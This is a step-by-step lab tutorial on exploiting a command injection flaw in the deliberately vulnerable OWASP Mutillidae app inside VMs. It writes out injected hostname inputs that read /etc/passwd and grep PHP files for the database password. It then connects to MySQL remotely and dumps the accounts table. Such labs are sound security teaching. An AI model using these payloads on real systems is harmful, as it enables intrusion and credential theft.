{ Command Injection Database Interrogation }
Section 0. Background Information |
- What Mutillidae?
- OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
- What is Command Injection?
- Command Injection occurs when an attacker is able to run operating system commands or serverside scripts from the web application. This vulnerability potential occurs when a web application allows you to commonly do a nslookup, whois, ping, traceroute and more from their webpage. You can test for the vulnerability by using a technique called fuzzing, where a ";" or "|" or "||" or "&" or "&&" is append to the end of the expected input (eg., www.cnn.com) followed by a command (eg., cat /etc/passwd).
- What is Fuzzing?
- Fuzz testing or fuzzing is a software testing technique that involves providing invalid, unexpected, or random data to the inputs of a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. Fuzzing is commonly used to test for security problems in software or computer systems.
- Pre-Requisite Lab
- Mutillidae: Lesson 1: How to Install Mutillidae in Fedora
- Note: Remote database access has been turned to provide an additional vulnerability.
- BackTrack: Lesson 1: Installing BackTrack 5
- Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
- Lab Notes
- In this lab we will do the following:
- Exploit a command injection/execution fuzzing vulnerability.
- Operating System Reconnaissance
- Application home directory Reconnaissance
- Database Reconnaissance
- Encoding PHP Script to view contents
- Remotely connecting to database
- Legal Disclaimer - không áp dụng các bài hướng dẫn trên hệ thống không có thẩm quyền
Section 1. Configure Fedora14 Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
- Edit Fedora Mutillidae Virtual Machine Settings
- Instructions:
- Highlight fedora14
- Click Edit virtual machine settings
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tihqt5KSKh0CULIYHLcAHgQabs0iWI3Dw9ecLM5T8JFgCtfOdpUt7zUzPiNb90I2-u3V2vCQws35O-jhRXuOnlFEHzh7mNOlRY13YjnV2pjQAXIAtuPoGos8zPzRlh3agdWDl8b949CRBY4OWIU9-5exeO8MIPy0aV6yT_nfRCaTEMM56dig=s0-d)
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click the OK Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tx4AWhPL6csLg6txt6Mauc8k5E1_G9ANlktnSsKnMMdRlnn-VTCExo3___Iyos0RGkCKakMPYb815NezyAt8pgw-Uwk2bLEzQjYA6xfk7NgwJK9KvH9lovrEazx2B2NuasNvAFszVNsHV2FB68zQQwUlnT-mOHvz1If4SJ6th_UmuLioP1Dg=s0-d)
Section 2. Login to Fedora14 - Mutillidae |
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
- Select Fedora14 - Mutillidae
- Play virtual machine
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uaVWXH2-ZI7l7uVJ6EXc3GNIsQokF3vL0fgDpe8tKqzJZSAhZyXWEQfJsRikOjVxDExUF7ry3eoFCWLHxEIQvLQob3YDA6htxjsRW1yRl2mUx15iabX7L-Sim14GkQMN3tGuKVbM-zDcNxCs6ezjZRw262Jm7fpTz-AuT64CIgkeHxkpwLDDSa=s0-d)
- Login to Fedora14 - Mutillidae
- Instructions:
- Login: student
- Password: <whatever you set it to>.
-
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sDMNRXy30dBeD-mKnkGAxKEB9bdsSBfaDkYHrpb8XqVrgRbKwiKePHiMWyxs1LivpZ_4eZI84UrbhQT_l4dTM3a4rbDFiSzZFvyHl-s1fHscFuQSeqj6JzUxv-79muplGJ4mSNIa6O5YgFXJ7vSebvuWSR3myOmmp2J4hMoK22NY7BQ90Z_NwPkA=s0-d)
Section 3. Open Console Terminal and Retrieve IP Address |
- Start a Terminal Console
- Instructions:
- Applications --> Terminal
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s5D0yPEyyP52dngWqn9p2AlbxUtVNK2m4HUA4rx-x--nbdQJF8pPS6taBZ1o9xj_HOtnNm5P1M1YprHaY3r71f8f1uNcAMxH_wl3i5ZCCiweUDXi6nqguhx5uqnJfxZlEMtmSrzwFF5upZw9snkGf3Q5QrWa0iEdy2bQR5tlGjMgGP3-2MOI-r=s0-d)
- Switch user to root
- Instructions:
- su - root
- <Whatever you set the root password to>
-
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_toNRuj-yFFENEOyTKGwVsxC1kPGsomqevYtJKNakDbcw1S1XSebAqCE-IRWXXgWvNLoIfHKgx41oQexwjss3S5RX4t0FrYXpbJODqao5awWX8TXvZ3ZE2-czQcezcehEh-MbQ92U1yICyBS76wyLXY7fBS2lnc1GOwylWOATM0edBxibWCbcci_g=s0-d)
- Get IP Address
- Instructions:
- ifconfig -a
- Notes (FYI):
- As indicated below, my IP address is 192.168.1.111.
- Please record your IP address.
Section 4. Configure BackTrack Virtual Machine Settings |
- Edit the BackTrack5R1 VM
- Instructions:
- Select BackTrack5R1 VM
- Click Edit virtual machine settings
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_slLxZmH_kW8EU1hQU9WH-p1CI70TTS8TufL_HfqQVNc6vzDocPdwqQhCzzHZ7N1H41NQn8Ttrc1o2ISgpLBXCMPtcEOQkyr4YaoQgfGkTPvuvEhW4dvJsf3kpaK6XSvrZ5UsFGiePtmXGHC1fI5snOGa0hYi1cLrXVnoXeE1UtHwDTm_xxIb8=s0-d)
- Edit Virtual Machine Settings
- Instructions:
- Click on Network Adapter
- Click on the Bridged Radio button
- Click on the OK Button
Section 5. Play and Login to BackTrack |
- Play the BackTrack5R1 VM
- Instructions:
- Click on the BackTrack5R1 VM
- Click on Play virtual machine
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sm41qA5myDPqXfu_bSySt7sokTHKSvqRKGcnG2bP6VDlc2Do9VzYCnEHAVRG2qlhr5o4BejDBa97U0eT4y_Ys4t8ng_kjcRogN4wO1kivAiCyGBh9oI8_QIsT_A1P_E59v9LrhvZQiAeqpcFlTP9azxEH27ZReu4ufKZyhjoZ7lo0uAF6BcdM=s0-d)
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed it to>.
- Bring up the GNOME
- Instructions:
- Type startx
Section 6. Open Console Terminal and Retrieve IP Address |
- On BackTrack, Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Obtain the IP Address
- Instructions:
- ifconfig -a
- Note(FYI):
- My IP address 192.168.1.109.
- In your case, it will probably be different.
- This is the machine that will be use to attack the victim machine (Metasploitable).
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s4TYmVP_aon1fQH26nCMa9Ezf3wgRJDAI_yH1pnea7QW7fyzvPCPKCAVviRBBt5Rv-9Nc61oHzuCAX8Aqm2u13GW6-lqlUMS0xxiGgyHDEdHDRMSKlyliUnCCjdL35qWywkdu53FoZYZ3XK9QNfnQAiNDpIxLqUUSTQNDyduAXf0XN6msO8sJG=s0-d)
Section 7. Start Web Browser Session to Mutillidae |
- On BackTrack, Open Firefox
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_se214O5EKFKsOxmOfiWUW5fubqsagColio_x06vzqaL-sZTtDTOZnLYcZ9K8xrCowyryLtrHPz-8k4aiMbUHJlyyzaciQJTcVKCYrg7f02O70SJjsh9jYhle0yVa0_LYU6pjpGSQi0OoxBGOguKYVADRhgpRWbxt24daaoCbUP60YJLtO3j0E=s0-d)
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- http://192.168.1.111/mutillidae
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vxO_5r35E7tOaqwA73hMWHmiBxDdVov6gZYN5nP_7CYg3yN8Nxom0WkrXMNvdMagyhMS_VxgH4LDHh6dqMHJoE3lVEVUHNLY2f3lZy6ah9O5sDNV1opmQKoy2YPOdMJXPCH9-9vhktnCcrJIufw_51_KIy63jIwPrSRkYrjbieOn79A2qPWFU=s0-d)
Section 8. Basic Command Execution Testing |
- Go to DNS Lookup
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vVBhtLp0JvRJskXOBtCdL-I8TcDG2ZnaOJV1dKEapzLIxBRM_nNSFVE783IUI2o05nRDvcaCFkBQNf4EpeKR_BeYHUpPVLTY-gnRwFu6ltIquduCZOYaXy7iZBNVbod7XTrXMPGSS-Q1DyekYIEdL9MSo-I2sVw1vHffbEkS6UC5Q5Pr3QZbEk=s0-d)
- Test DNS Lookup
- Notes (FYI):
- DNS Lookup on the surface is design to do just that,,, provide a DNS Lookup.
- Instructions:
- Hostname/IP: www.cnn.com
- Click the Lookup DNS button
- View your Results
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sQLrW1mrr8L9S0OwC70qr0OyIOLECBc3e3kevW04gF4X82NtbkQ8GQBi4IKxBenLpsaDw9VAq5DsJYKQGZO7bg3DuLDbnzTAJ3zm7Dslbh71V5ztI0AJJ8pm5rj-H9hokAIv0EjgJacor5Zowwvv9fvDZihJiO0xxsZ-DidJl2a6Ri9SxNWvsf=s0-d)
- Test DNS Lookup Vulnerability
- Notes (FYI):
- Now we will test a security vulnerable that will let us append a Unix/Linux command to the end of the hostname we are looking up.
- The procedure of appending a ";" after what the application expects, is called command fuzzing.
- Below you will run the "uname -a" command
- Instructions:
- Hostname/IP: www.cnn.com; uname -a
- Click the Lookup DNS button
- View your Results
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vZ2Bg8LPYm0If0asdR5Dp2fKyRVCD1xdyLO9j8H7nq2VK8xpWXtrBLvmKftpJwGonMo_BolZanB064z9APZnk7iL7_O4XXFkdN9dD4s8_aFc7hBovr7kCT-s-vTtVMM1TO5nDsdvILvZ-vYlVc4qvq693_HwkzO-HoBb1i0j2wHV2Tw8HNv-OE=s0-d)
- Perform Reconnaissance
- Notes (FYI):
- Don't you think it would be nice to know where there particular web page application is running from?
- Now we are going to run the "pwd" to show us the current working directory.
- Also, notice in the Address Bar that the application is called dns-lookup.php
- Instructions:
- Hostname/IP: www.cnn.com; pwd
- Click the Lookup DNS button
- View your Results
- Notice that dns-lookup.php is the vulnerable program.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vBHjWAX4Arxs5k5FYhyrFENwhq32f1Udg0mh3DYd8JepN2e5pjcX0MoW8erMgCYq4w3VH7Jqql6KqesLshMIXIYwpEhMECsa7CzPbmKcgov2htOpXPPCLWw0V83MgdCG9Ras4zhqx6Gu_ZAxJ5trTQQJyqtQZ5hmDvWERZ4NAxDHEeNzK_kr1y=s0-d)
- Interrogate the dns-lookup.php application
- Notes (FYI):
- Just for grins, let's see if we can find the line of code where PHP is executing a system call.
- I will use the xargs command to search, using egrep, for the following strings: exec OR system OR virtual.
- Instructions:
- Hostname/IP:
- www.cnn.com; find /var/www/html/mutillidae -name "dns-lookup.php" | xargs egrep '(exec|system|virtual)'
- Click the Lookup DNS button
- View your Results
- Notice there is a function called shell_exec(), that is actually executing the Linux command "nslookup".
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uOJ4Ud0tX0fir2ErMo_eiLGDXPUu4DOqHXsmo9F1j1VurAr1-P2aBC94OezAdWnOBBbLcEddtuymPZ4KWiHT6EPyJAeSNLdmWJ_1Cme81QnjRfP4463TOBj0JA5JK9JgLNCXbPn5g5o6pjGpZdOEoSp-PZgvjIxbPDi1CAi2pw2KbdSsZnyToD=s0-d)
Section 9. Database Reconnaissance |
- Discover the Database Engine using the /etc/passwd file
- Notes (FYI):
- Let's search the /etc/passwd file for the following strings: postgres, sql, db2 and ora.
- Instructions:
- Hostname/IP:
- www.cnn.com; cat /etc/passwd | egrep -i '(postgres|sql|db2|ora)'
- Click the Lookup DNS button
- View your Results
- MySQL is the database engine
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uxTPzDo6D33BCvYoP4BGMPDrLZ3HjskuIUPRwrWHbwFmryWoMpw6XIvx8t9ZcaNFqPOlSkfR-xFczI0PY109_tBAYzYsuTy4wE-dELP3REXhxe78LwCM3LkKkclP7JzOyL7cFeko2Ix2TE1ULxfE7gXv7KulCmP28WUye1G5_PD9PfxbyaR9M=s0-d)
- Discover the Database Engine using the "ps" command
- Notes (FYI):
- Let's use the "ps" command to search for the following process strings: postgres, sql, db2 and ora.
- Instructions:
- Hostname/IP:
- www.cnn.com; ps -eaf | egrep -i '(postgres|sql|db2|ora)'
- Click the Lookup DNS button
- View your Results
- The mysqld (daemon) is running.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vw-JoZqAoZOoBkky7UVLbnDI2WVZ732WgmEzKFgpS6aDu7ilp3OGuEn7yVpKCGWy0X-dXsqfl19yQW8Pgjl5cV-XVzaZquQYvYoVIczgT1E9G2csj53dpvdgeFrTn5pwvElAHALrAG2rgE7k7pqhxmM6JuZqPXB4kmEPJQxzdOLb2MaS79ig=s0-d)
Section 10. Database Interrogation |
- List all php scripts
- Notes (FYI):
- Our next step is to try to figure out if any of the php scripts located under /var/www/html/mutillidae contain a database username and password.
- But, first list all the php scripts.
- Instructions:
- Hostname/IP:
- www.cnn.com; find /var/www/html/mutillidae -name "*.php"
- Click the Lookup DNS button
- View your Results
- There is over 900+ php scripts.
- Search php scripts for the string password
- Notes (FYI):
- Now we will search the 900+ php scripts for the string "password" and "=".
- Instructions:
- Hostname/IP:
- www.cnn.com; find /var/www/html/mutillidae -name "*.php" | xargs grep -i "password" | grep "="
- Click the Lookup DNS button
- View your Results (Continue to next step).
- Obtain password from search results
- Notes (FYI):
- Now you have to look closely to see the string password and the actual password "samurai".
- Instructions:
- Notice that the MySQLHandler.php contains the following string:
- $mMySQLDatabasePassword = "samurai";
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uUOfxJMIa5_UpsNk228LOo7dMtMsKBYYslLhntE2Ka2weNH3kA3ggB_VFJlyQs90Jw2YJpUNOb1_WvxtKI3w0gDeWLaYQwbGcN_TBC9mC-BIOFEXGAXt_Ct1DCvlL3RZGJ0y7qdbpuV3IjCEGJAMAdN7oE1c6opWdxR_8XBaa267uJbVEr_UM=s0-d)
- Search MySQLHandler.php for the strings user OR login
- Notes (FYI):
- We now know that MySQLHandler.php contains the database password.
- The only thing left it to obtain the database username for the password samarai.
- Instructions:
- Hostname/IP:
- www.cnn.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs egrep -i '(user|login)' | grep "="
- Click the Lookup DNS button
- View your Results (Continue to next step).
- Obtain username from search results
- Instructions:
- Notice that the MySQLHandler.php contains the following string:
- $mMySQLDatabaseUsername = "root";
- Notice the MySQL connection method.
- mMySQLConnection = new mysqli($HOSTNAME, $USERNAME, $SAMURAI_WTF_PASSWORD);
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sp9w-yk-29-d9aqqh9Dq1uqSWmo6hLKyIr5NJ7bklCI88KsBH2Nl3smxYv_pM39vQYVvVoeMWXcLeO23AOpbUFiAnU5oNaWkTj-zsUrS_PK-P2tDRvfdkieZ3op7qcyaR-OY0q2-4iG_ipr12wANRxLs6a3S0fgHNIUQaufmDPPR6ztSJNqSxG=s0-d)
- Display MySQLHandler.php
- Notes (FYI):
- I guess I could have showed you this first, but good things come to those that wait.
- It is possible to display the contents of the MySQLHandler.php program, by encoding the "<?php" and "?>" tags. These tags tell apache to execute a php script. To get around this problem and just display the text of the program, we change "<" to "<" and ">" to ">".
- Instructions:
- Hostname/IP:
- www.cnn.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\</g' | sed 's/>/\>/g'
- Click the Lookup DNS button
- View your Results (Continue to next step).
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sf9nlFdmNqk4DndXrBIZTJF3gEBOtfLPxbfTn3P7twwUXO5BcUyKUoO18_s6V1r495tn5V5_B-VwcPjqR2xA4IQnc9ZdFvsPKeR4nC_DFRSU8sRKoH69w-sadMNvbFz8iMK-ogIglC60-B8ZHR3DRL55fBhr9h_loCPZo4D84KGI2WDBhOc56I=s0-d)
- Viewing the Code
- Notes (FYI):
- Kind of scary,,, right?
- Typically, you should never put authentication information into a program that accesses a database on the web.
- Instructions:
- Database Username
- static public $mMySQLDatabaseUsername = "root";
- Database Password
- static public $mMySQLDatabasePassword = "samurai";
- Database Name
- static public $mMySQLDatabaseName = "nowasp";
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vgaQ17Q0WkmmmAbixy96AFaAqu4Gce05q1V0xh08ZWcO_OKyb3zybJ0JEmFXB2cdcw8VxWWtiEaaFCagRoUQY27y3GhimzhqeMZ2pIW03KLBs2YHv8d-AKGve_rqWQgh5uQ1p-I016WHY9UB9R9vqp1vLVQpqVxaaO2uzsstjLpvPXzn2_nDkL=s0-d)
Section 11. Connect Remotely to MySQL |
- On BackTrack, Open a Terminal
- Instructions:
- Click on the Terminal Icon
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uXEefFjdmVEK9zqfHMnRec2qOc8wHSOuvInuVEEsu37LYD3MuH6XQJvhVnFQszwyJiz3UZe-ZQBQn1zxFVv2ZpEbJBbA_5R45HjsGbQAiUqjH4jCThzNzFzTYOVxhez9gA1adv9nfb7tBrkdXdyhvAruioKaaU41HrUFy7fUZVkBjwaDpJIw=s0-d)
- Connect Remotely to the Mutillidae Database
- Notes (FYI):
- Replace 192.168.1.111 with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- mysql -h 192.168.1.111 -uroot -psamurai
- show databases;
- use nowasp;
- Table Navigation
- Notes (FYI):
- Basically, we are looking for a table that contains username and password information.
- In this case, the account table contain the authentication information.
- Instructions:
- show tables;
- desc accounts;
- Display Account Table Records
- Instructions:
- select * from accounts;
- quit;
- Proof of Lab
- Notes (FYI):
- Replace 192.168.1.111 with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- cd
- mysql -h 192.168.1.111 -uroot -psamurai -e "select * from nowasp.accounts" > account.txt
- ls -l account.txt
- date
- echo "Your Name"
- Replace the string "Your Name" with your actual name.
- e.g., echo "John Gray"
- Proof of Lab Instructions:
- Do a PrtScn
- Paste into a word document
- Upload to website www.antoanthongtin.edu.vn
-
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sWoFfWxwwYlG-RVSIoORwLyz5mAlm_gmY_8yDNbq3zNsESikMor6mDG7Oq6WUoVQwSp1JUXlO2_qAF0MZO5v5ZohWPvjmIGcsmnwo3t8GYN01uYoKCerpZ7rgNowufo2kPmXY42lcAsyOzcxK6p10MXHxroqjoosNax2vExpfBnmcAA9Ft-aZZ=s0-d)
Không có nhận xét nào:
Đăng nhận xét